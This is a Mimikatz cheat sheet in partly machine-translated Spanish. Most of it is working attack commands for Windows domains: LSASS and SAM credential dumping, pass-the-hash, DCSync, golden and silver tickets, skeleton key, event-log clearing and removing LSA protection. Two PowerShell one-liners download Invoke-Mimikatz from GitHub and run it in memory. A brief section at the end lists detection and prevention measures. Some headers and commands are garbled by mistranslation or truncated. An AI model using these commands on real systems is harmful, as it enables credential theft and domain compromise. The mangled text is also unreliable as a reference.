Mimikatz Cheat Sheet
Sinopsis
Mimikatz es una poderosa herramienta de dumping y manipulación credencial desarrollada por Benjamin Delpy (@gentilkiwi). Puede extraer contraseñas de texto claro, hashes, códigos PIN y tickets de Kerberos de memoria, así como realizar varios ataques como pasar-el-hash, pasar-el-ticket, y la creación de boletos de oro.
NOVEDAD Advertencia: Mimikatz es una herramienta de pruebas de seguridad que se puede utilizar malintencionadamente. Úsalo en ambientes donde tienes permiso explícito para hacerlo.
Obtención de Mimikatz
Repositorio oficial
- GitHub.
- Última publicación: [URL_1__)
Binarios precompilados
mimikatz.exe - 32-bit ejecutablemimikatz_trunk.zip - Contiene ejecutables de 32 bits y 64 bits
Compilation from Source
git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build
Uso básico
Corriendo Mimikatz
# Run directly
mimikatz.exe
# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Privilegios elevados
Obtener ayuda
help
<module>::
<module>::<command> /?
Exiting Mimikatz
Módulos y comandos básicos
sekurlsa Module (LSASS Memory Access)
| Command |
Description |
sekurlsa::logonpasswords |
Extract all logon passwords |
sekurlsa::tickets |
Extract Kerberos tickets |
sekurlsa::ekeys |
Extract Kerberos encryption keys |
sekurlsa::dpapi |
Extract DPAPI master keys |
sekurlsa::credman |
Extract credentials from Windows Credential Manager |
sekurlsa::msv |
Extract MSV authentication information |
sekurlsa::tspkg |
Extract TSPKG authentication information |
sekurlsa::wdigest |
Extract WDigest authentication information |
sekurlsa::kerberos |
Extract Kerberos authentication information |
sekurlsa::ssp |
Extract SSP authentication information |
sekurlsa::livessp |
Extract LiveSSP authentication information |
sekurlsa::cloudap |
Extract CloudAP authentication information |
Módulo de bomba (SAM y Active Directory)
| Command |
Description |
lsadump::sam |
Extract hashes from the SAM database |
lsadump::secrets |
Extract LSA secrets |
lsadump::cache |
Extract cached domain credentials |
lsadump::dcsync |
Perform DCSync attack to retrieve password data |
lsadump::lsa |
Extract LSA secrets |
lsadump::trust |
Extract domain trust keys |
lsadump::backupkeys |
Extract domain backup keys |
Módulo kerberos (Manipulación de bolsillo)
| Command |
Description |
kerberos::list |
List all Kerberos tickets |
kerberos::purge |
Purge all Kerberos tickets |
kerberos::ptt |
Pass-the-ticket (inject a ticket) |
kerberos::golden |
Create a golden ticket |
kerberos::silver |
Create a silver ticket |
kerberos::tgt |
Create a TGT |
kerberos::hash |
Calculate Kerberos keys from password |
Módulo crypto (Operaciones Criptográficas)
| Command |
Description |
crypto::certificates |
List certificates |
crypto::keys |
List keys |
crypto::system |
List system certificates |
crypto::capi |
List CAPI certificates |
crypto::cng |
List CNG certificates |
crypto::stores |
List certificate stores |
Módulo de bóveda (Windows Vault Access)
| Command |
Description |
vault::cred |
List credentials in Windows Vault |
vault::list |
List vault credentials |
token Module (Token Manipulation)
| Command |
Description |
token::whoami |
Display current token information |
token::list |
List all tokens |
token::elevate |
Elevate token privileges |
token::revert |
Revert token |
token::run |
Run a process with a token |
(Privilege Management)
| Command |
Description |
privilege::debug |
Enable debug privilege |
privilege::driver |
Load a driver |
módulo de evento (Event Log Management)
| Command |
Description |
event::clear |
Clear event logs |
event::drop |
Drop event logs |
ts Module (Terminal Services)
| Command |
Description |
ts::sessions |
List terminal services sessions |
ts::multirdp |
Enable multiple RDP sessions |
misc Module (Miscellaneous)
| Command |
Description |
misc::cmd |
Command prompt |
misc::regedit |
Registry editor |
misc::taskmgr |
Task manager |
misc::ncroutemon |
Network connection route monitor |
misc::detours |
Detours detection |
misc::skeleton |
Install skeleton key |
Técnicas de ataque comunes
Credencial Dumping
privilege::debug
sekurlsa::logonpasswords
privilege::debug
token::elevate
lsadump::sam
Extract Cached Domain Credenciales
privilege::debug
lsadump::cache
# Create dump with Task Manager or procdump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Ataques del Hash
Pase el Hash con NTLM
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D
Pase el Hash con AES Keys
sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF
Over-Pass-the-Hash (Convertir NTLM a Kerberos)
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe
DCSync Attack
lsadump::dcsync /domain:contoso.local /all
lsadump::dcsync /domain:contoso.local /user:Administrator
lsadump::dcsync /domain:contoso.local /user:krbtgt
Kerberos Ticket Attacks
Lista de entradas Kerberos
Crear un billete de oro
# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi
Crear un billete de plata
# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi
Pase el truco
kerberos::ptt golden.kirbi
Purge Tickets
Skeleton Key Attack
privilege::debug
misc::skeleton
Técnicas avanzadas
LSA Protection Bypass
# Load mimikatz driver
mimidrv::service
# Enable debug privilege
privilege::debug
# Load driver
!+
# Remove LSASS protection
!processprotect /process:lsass.exe /remove
# Extract credentials
sekurlsa::logonpasswords
Operaciones remotas
# Create process dump of LSASS
# Using Task Manager or procdump:
# procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Analyze dump file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Extract Domain Backup Keys
lsadump::backupkeys /system:dc01.contoso.local /export
Ejemplos de comando con parámetros
sekurlsa::logonpasswords
sekurlsa::logonpasswords [/patch]
sekurlsa:
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]
bulto::dcsync
lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:\\\\{object-guid\\\\}]
lsadump::dcsync /domain:DOMAIN /all [/csv]
kerberos:golden
kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]
kerberos:
kerberos::ptt TICKET_FILE
Medidas de defensa
Métodos de detección
- Monitor for process creation of mimikatz.exe or suspicious processes accessing lsass. exe
- Monitor for suspicious LSASS Memory access
- Monitor for DCSync operations (replication requests from non-DC machines)
- Monitor para la creación y manipulación de entradas
- Monitor for privilege escalation
Métodos de prevención
- Enable LSA Protection (RunAsPPL)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
```
- Enable Credential Guard (Windows 10/Server 2016+)
- Aplicación protegida Grupo de usuarios
- Desactivar la autenticación WDigest
- Implementar Sólo Suficiente Administración (JEA)
- rotación de contraseñas regulares
- Limitar los privilegios administrativos
- Utilice contraseñas fuertes
Recursos